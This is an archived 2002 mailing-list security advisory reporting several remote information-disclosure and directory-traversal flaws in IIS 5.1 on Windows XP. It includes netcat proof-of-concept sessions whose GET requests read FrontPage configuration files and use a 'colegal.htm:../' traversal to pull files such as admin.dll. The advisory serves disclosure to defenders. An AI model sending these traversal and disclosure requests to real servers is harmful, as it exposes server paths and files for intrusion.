This is the CORRECTED POST, please ignore the one before on the same subject: MULTIPLE Remote Issues with IIS 5.1 on Windows XP

From: Adonis.No.Spam (adonis1at_private)
Date: Sun Feb 10 2002 - 18:29:36 PST


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                             .---------------.
                            / NtWaK0 Advisory \
+---------------------------------------------------------------------------.

Affected         : Windows XP with IIS 5.1
Type             : MULTIPLE Remote Issues
Type             : Remote/ Local Security Issues
Date             : 10-02-2002
Author           : NtWaK0 @ www.SafeHack.com
Credit           : NtWaK0 @ www.SafeHack.com

+---------------------------------------------------------------------------.

+--------------------.
 Remote/Local Exploit \
+----------------------`----------------------------------------------------.

+-----------.                                  * * * www.SafeHack.com * * *
 Disclaimer  \
+-------------`-------------------------------------------------------------.

This material is presented for informational and entertainment purposes
only, and to satisfy the curious. Any activities described in this file
which involve vandalism, theft, or any other illegal activities are
recounted from third-party conversations. I do not condone or encourage
vandalism or theft. I do not accept any liability for anything anyone
does with this information. So, don't shoot the messenger.
Remember: Use a computer in ways that ensure respect for your fellows.

+-------.
 T.O.C.  \
+---------`-----------------------------------------------------------------.

   [  Brief History ]
   [  The Problem   ]
   [  The Solution  ]

+-------------.
 Brief History \
+---------------`-----------------------------------------------------------.
I had the chance to play for a couple of hours with IIS 5.1 on a friend's box,
thanks to Recon. While I was trying some stuff on IIS 5.1 I found MANY problems
with the default IIS 5.1 installation and with files installed by default.

This one is not the same as the one reported earlier. The one reported
before had to deal with "GET /_vti_bin/shtml.dll".
A copy of it can be found at:
http://www.safehack.com/Advisory/shtmldump.txt

+-------+
 Test OS
+-------+
Tested on Windows XP with IIS 5.1

Please continue to read for more details.

+-----------.
 The Problem \
+-------------`-------------------------------------------------------------.

>>> 1- Issue <<<

Identify the web directory of the installation. By sending
"GET /_vti_pvt/access.cnf" you can identify the web installation path.
As we all know this is a helpful piece of information for anyone who is
going to attack your web site.

>>> Proof-Of-Concept <<<
C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/access.cnf
vti_encoding:SR|utf8-nl
RealmName:LAMER
InheritPermissions:false
PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt

There is another security issue with this too: "InheritPermissions:false"
reveals the security inheritance setting of that folder.

>>> 2- Issue <<<
>>> Proof-Of-Concept <<<

C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/botinfs.cnf

vti_encoding:SR|utf8-nl
D\:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\
40\\bots\\vinavbar\\vinavbar.inf:VW|vinavbar

>>> 3- Issue <<<

>>> Proof-Of-Concept <<<
C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/bots.cnf
vti_encoding:SR|utf8-nl
vinavbar:VW|D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft\\ Shared
\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar\\\\vinavbar.inf
vinavbar E I info N D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft
\\ Shared\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar
\\\\fp4Avnb.dll

>>> 4- Issue <<<
Using GET /iishelp/common/colegal.htm you can access other files under the
web structure. I did not have a chance to test it on files above the
web structure. Like I said, I do not run IIS 5.1 but a friend does.
One of these days I am going to buy more memory for one of my old boxes and
slap IIS 5.1 on it to be able to do better tests.

>>> Proof-Of-Concept <<<
C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf
vti_encoding:SR|utf8-nl
RealmName:LAMER
InheritPermissions:false
PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt

writeto.cnf [Extracted From]
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/
prodtechnol/office/reskit/fp98serk/appendixes/A_SPFILE.asp

Back links for files that can be written to by users of the web, such as
Save Results Form handler result files. Files that can be written to by
users of the web have a looser security setting than regular web content.


C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /iishelp/common/colegal.htm:../../../../../_vti_bin/_vti_adm/admin.dll
MZ[...]This program cannot be run in DOS mode.
[remainder of the binary PE image returned by the server, not reproduced]


C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/linkinfo.cnf
vti_encoding:SR|utf8-nl
javascript\:loadhelpfront();:localstart.asp
javascript\:activate(<%=iver%>);:localstart.asp
http\://www.safehack.com:index.htm
/iishelp/common/colegal.htm:localstart.asp


NOTE: A search on Google for "writeto.cnf" returned alarming results
http://www.google.com/search?q=writeto.cnf&hl=en&btnG=Google+Search&meta=

+------------.
 The Solution \
+--------------`------------------------------------------------------------.
No idea. Vendor was informed.
If you are going to use the issues found here, credit must be given to the
author. NtWaK0 @ www.safehack.com
+---------------------------------------------------------------------------.
    
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

iQA/AwUBPGcsA/PoW9fFNsN8EQJ3iwCfeLCNw3XWJS7c7bPG1pkqgM06ihEAoOdV
w0aAHeJqCi7MoCs62m5AR8dm
=u7kB
-----END PGP SIGNATURE-----

________________________________________________________________________
The only secure computer is one that's unplugged, locked in a safe,
and buried 20 feet under the ground in a secret location... and i'm
not even too sure about that one"--Dennis Huges, FBI.
____________________________________________________________.___________
Live Well Do Good  www.SafeHack.com                         |
Je Pense, Donc Je Suis                                    \(|)/
I know I ain't perfect, but i'm 99 point 9 percent :)    --(")--
RFCs are meant to be read and followed…:)                  /`\  NtWaK0
________________________________________________________________________
Connect yourself to the main computer and let me take you to a
cybernetic ride. Are you connected to the right cybernet? If you are,
finally you are connected to my brain.
________________________________________________________________________
-=- Use a computer in a ways that ensure respect for your fellow     -=-
    



    This archive was generated by hypermail 2b30 : Mon Feb 11 2002 - 15:06:50 PST